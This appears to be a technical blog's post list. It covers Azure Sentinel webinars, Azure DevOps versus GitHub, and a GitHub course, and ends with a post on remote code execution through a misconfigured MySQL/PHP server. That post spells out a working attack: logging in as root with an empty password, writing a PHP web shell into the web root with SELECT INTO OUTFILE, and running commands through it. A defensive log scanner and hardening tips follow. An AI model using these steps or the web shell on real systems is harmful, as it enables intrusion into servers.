Oct 12, 2021

Cloud & On-Premises architecture

 

Azure Sentinel webinar: Cloud & On-Premises architecture [ 89 min ] 

Links:

  • https://www.youtube.com/watch?v=_mm3GNwPBHU

Oct 11, 2021

Understanding Azure Sentinel features and functionality deep dive


Microsoft Azure Sentinel webinar: Post-Ignite. Understanding Azure Sentinel features and functionality deep dive. [ 88 min ]

Links:

  • https://www.youtube.com/watch?v=7An7BB-CcQI

Oct 5, 2021

Comparing Microsoft’s DevOps Tools

Azure DevOps vs GitHub

Context

Once upon a time, there was a Microsoft product called Team Foundation Server (TFS). The online version of TFS then became Visual Studio Online, which became Visual Studio Team Services, which is now Azure DevOps.

Microsoft bought GitHub in 2018. GitHub is also a DevOps tool and shares a lot of the same features.

Azure DevOps and GitHub Comparison

Closed Source vs Open Source Management

  • GitHub: Preferred by the community. Offers both public and private repositories.
  • Azure DevOps: Preferred by the enterprise. Offers both public and private repositories.
  • Which is better? Even Microsoft hosts most of their open-source projects on GitHub.

For the full details, read the article at A Cloud Guru.

Links:

  • https://acloudguru.com/blog/engineering/azure-devops-vs-github-comparing-microsofts-devops-twins
  • https://azure.microsoft.com/en-us/services/devops/repos/

Oct 4, 2021

Introduction to GitHub

If you are looking for a quick and fun introduction to GitHub, you've found it. This class will get you started using GitHub in less than an hour. 

Prerequisites

None. This course is a great introduction for your first day on GitHub.

 

What you'll learn

We'll answer common questions like:

  • What is GitHub?
  • How does one use GitHub?
  • What are issues and pull requests?
  • How do you create a branch and a commit?
  • How do you use GitHub Pages?

And when you're done you'll be able to:

  • Communicate in issues
  • Manage notifications
  • Create branches
  • Make commits
  • Introduce changes with pull requests
  • Deploy a web page to GitHub Pages

 

Links:

  • https://lab.github.com/githubtraining/introduction-to-github

Oct 2, 2021

RCE via MySQL/PHP

This is a simple and effective exploitation of a misconfigured MySQL/PHP server.


First, use nmap to discover a misconfigured MySQL server where root has an empty password.

Second, connect to the MySQL server with the mysql client.

$ mysql -u root -h 192.168.1.33

Then create a PHP backdoor with the following SQL commands (the first is a test write to /tmp/test):

MySQL > select 'Hello World' into outfile '/tmp/test' from mysql.user limit 1;

MySQL > select '<?php $output=shell_exec($_GET["cmd"]);echo "<pre>".$output."</pre>"?>' into outfile '/var/www/html/shell.php' from mysql.user limit 1;

Lastly, start exploiting it from the browser:

http://192.168.1.33/shell.php

http://192.168.1.33/shell.php?cmd=id

http://192.168.1.33/shell.php?cmd=ps -eaf
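
From the defender's side, the SELECT ... INTO OUTFILE statements above show up in the MySQL general query log when it is enabled. The following is an added example, not part of the original post, that flags such statements and rates writes into a web root as high severity; the log line layout, the web-root and extension lists, and the sample lines are assumptions constructed for illustration.

```python
import posixpath
import re

# Assumptions: directories served by the web server and extensions it executes.
WEB_ROOTS = ("/var/www/", "/srv/www/", "/usr/share/nginx/html/")
SCRIPT_EXTS = (".php", ".phtml", ".phar")

# Assumed general query log layout: timestamp, connection id, command, statement.
LOG_RE = re.compile(r"^(\S+)\s+(\d+)\s+Query\s+(.*)$")
# INTO OUTFILE / INTO DUMPFILE followed by a quoted target path.
WRITE_RE = re.compile(r"\binto\s+(?:outfile|dumpfile)\s+(['\"])(.+?)\1", re.I)

def classify(statement):
    """Return (severity, path) if the statement writes a file, else None."""
    matches = WRITE_RE.findall(statement)
    if not matches:
        return None
    # Use the last match: an earlier one may sit inside a string literal.
    # normpath collapses "../" so /tmp/../var/www/... is still recognised.
    path = posixpath.normpath(matches[-1][1])
    in_web_root = path.startswith(WEB_ROOTS)
    is_script = path.lower().endswith(SCRIPT_EXTS)
    return ("high" if in_web_root or is_script else "review", path)

def scan(lines):
    """Yield (timestamp, connection_id, severity, path) per file-writing query."""
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # Connect, Quit and other non-Query entries
        hit = classify(m.group(3))
        if hit:
            yield (m.group(1), int(m.group(2)), hit[0], hit[1])

# Constructed sample log lines (not captured from a real server).
SAMPLE_LOG = [
    "2021-10-02T10:15:01.000000Z\t   12 Connect\troot@192.168.1.50 on  using TCP/IP",
    "2021-10-02T10:15:09.000000Z\t   12 Query\tselect 'Hello World' into outfile '/tmp/test' from mysql.user limit 1",
    "2021-10-02T10:15:30.000000Z\t   12 Query\tselect '<?php /* payload elided */ ?>' into outfile '/var/www/html/shell.php' from mysql.user limit 1",
    "2021-10-02T10:16:02.000000Z\t   14 Query\tSELECT 1 INTO DUMPFILE '/tmp/../var/www/html/x.txt'",
    "2021-10-02T10:16:40.000000Z\t   15 Query\tselect user, host from mysql.user",
]

if __name__ == "__main__":
    for ts, conn, sev, path in scan(SAMPLE_LOG):
        print(f"{ts} conn={conn} [{sev}] file write -> {path}")
```

Setting secure_file_priv to a dedicated directory (or to NULL) stops the server from writing into the web root this way. The root account should also have a password and should not be reachable from remote hosts.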